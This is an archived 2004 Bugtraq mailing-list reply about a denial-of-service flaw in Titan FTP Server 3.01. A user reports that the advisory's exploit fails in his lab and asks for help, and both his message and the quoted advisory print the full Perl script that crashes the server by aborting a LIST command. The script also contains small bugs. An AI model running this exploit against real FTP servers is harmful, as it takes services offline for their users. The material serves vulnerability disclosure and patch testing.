lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Thu, 06 May 2004 19:19:59 -0700
From: Gene Ken <gken@....sina.com>
To: Aviram Jenik <aviram@...ondsecurity.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: Titan FTP Server Aborted LIST DoS


Hi Aviram,

   I have some trouble with the testing of current exploit, the below
is my tested procedure:

1) In my test bed, the host side is winxp professional with ip_addr 192.168.0.2
   (english, 5.1 build 2600), and the client side is redhat linux 9 using 
NAT in
   Vmware Workstation 4.5.1 build-7568 with ip_addr 192.168.92.3.

2) I have successfully Titan Ftp Server v3.01 Build 163 installed on Winxp Pro
    platform. also the perl script u mentioned in ur article has successfully
    executed like as the below:

/* on my redhat box, i use ftp to verify if the titan ftp server is 
running, the
    result is the info as below: */

[gken@rh9 gken]$ ftp 192.168.0.2
Connected to 192.168.0.2 (192.168.0.2).
220 Titan FTP Server 3.01.163 Ready.
Name (192.168.0.2:gken): gken
331 User name okay, need password.
Password:
230-Welcome gken from 192.168.0.2. You are now logged in to the server.
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.

/* executing titan.pl script */
[gken@rh9 gken]$ perl titan.pl
Combination:
cannot connect to ftp daemon on 192.168.0.2 at titan.pl line 22.


    how to tackle this? thx in advance!



---the titan.pl---
  #!/usr/bin/perl
  # Test for Titan FTP server security vulnerability
  #
  # Orkut users? Come join the SecuriTeam community
  # http://www.orkut.com/Community.aspx?cmm=44441
  #
  use IO::Socket;

  $host = "192.168.0.2";

  my @combination;
  $combination[0] = "LIST \r\n";

  for (my $i = 0; $combination[$i] ; $i++)
  {
   print "Combination: $1\n";

   $remote = IO::Socket::INET->new ( Proto => "tcp",
       PeerAddr => $host,
       PeerPort => "2112",
       );
   unless ($remote) { die "cannot connect to ftp daemon on $host" }

   print "connected\n";
   while (<$remote>)
   {
    print $_;
    if (/220 /)
    {
     last;
    }
   }

   $remote->autoflush(1);

   my $ftp = "USER anonymous\r\n";

   print $remote $ftp;
   print $ftp;

   while (<$remote>)
   {
    print $_;
    if (/331 /)
    {
     last;
    }
   }

   $ftp = "PASS a\@b.com\r\n";
   print $remote $ftp;
   print $ftp;

   while (<$remote>)
   {
    print $_;
    if (/230 /)
    {
     last;
    }
   }

   $ftp = $combination[$i];

   print $remote $ftp;
   print $ftp;

   while (<$remote>)
   {
    print $_;
    if (/150 /)
    {
     last;
    }


   close $remote;
  }
}

At 05:51 AM 5/5/2004, you wrote:
>  Titan FTP Server Aborted LIST DoS
>----------------------------------------------------
>
>
>Article reference:
>http://www.securiteam.com/windowsntfocus/5RP0215CUU.html
>
>
>SUMMARY
>
>A security vulnerability exists in South River Technologies' Titan FTP 
>Server.
>An attacker issuing a LIST command and disconnecting before the LIST command
>had the time to connect, will cause the program to try and access an invalid
>socket. This will result in the FTP service's crash (and in turn, no longer
>being able to service any additional users).
>
>
>DETAILS
>
>Vulnerable Systems:
>   * Titan FTP Server version 3.01 build 163
>
>  Immune Systems:
>   * Titan FTP Server version 3.10 build 169
>
>  Solution:
>  To solve this issue upgrade to the latest version (3.10 build 169 or newer).
>
>  Exploit:
>  #!/usr/bin/perl
>  # Test for Titan FTP server security vulnerability
>  #
>  # Orkut users? Come join the SecuriTeam community
>  # http://www.orkut.com/Community.aspx?cmm=44441
>  #
>  use IO::Socket;
>
>  $host = "192.168.1.243";
>
>  my @combination;
>  $combination[0] = "LIST \r\n";
>
>  for (my $i = 0; $combination[$i] ; $i++)
>  {
>   print "Combination: $1\n";
>
>   $remote = IO::Socket::INET->new ( Proto => "tcp",
>       PeerAddr => $host,
>       PeerPort => "2112",
>       );
>   unless ($remote) { die "cannot connect to ftp daemon on $host" }
>
>   print "connected\n";
>   while (<$remote>)
>   {
>    print $_;
>    if (/220 /)
>    {
>     last;
>    }
>   }
>
>   $remote->autoflush(1);
>
>   my $ftp = "USER anonymous\r\n";
>
>   print $remote $ftp;
>   print $ftp;
>
>   while (<$remote>)
>   {
>    print $_;
>    if (/331 /)
>    {
>     last;
>    }
>   }
>
>   $ftp = "PASS a\@b.com\r\n";
>   print $remote $ftp;
>   print $ftp;
>
>   while (<$remote>)
>   {
>    print $_;
>    if (/230 /)
>    {
>     last;
>    }
>   }
>
>   $ftp = $combination[$i];
>
>   print $remote $ftp;
>   print $ftp;
>
>   while (<$remote>)
>   {
>    print $_;
>    if (/150 /)
>    {
>     last;
>    }
>
>
>   close $remote;
>  }
>
>
>ADDITIONAL INFORMATION
>
>SecurITeam would like to thank  <mailto:storm@...uriteam.com> STORM for
>finding this vulnerability.
>
>
>
>
>Regards,
>Aviram Jenik
>Beyond Security Ltd.
>
>http://www.BeyondSecurity.com
>http://www.SecuriTeam.com
>
>The First Integrated Network and Web Application Vulnerability Scanner:
>http://www.beyondsecurity.com/webscan-wp.pdf
>
>
>
>
>====================
>====================
>
>DISCLAIMER:
>The information in this bulletin is provided "AS IS" without warranty of any
>kind.
>In no event shall we be liable for any damages whatsoever including direct,
>indirect, incidental, consequential, loss of business profits or special
>damages.

Regards,

Gene Ken
86-10-62928315 (Home)
86-13901016339 (Cell)
/* Out of intense complexities, emerge intense simplicities. */

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ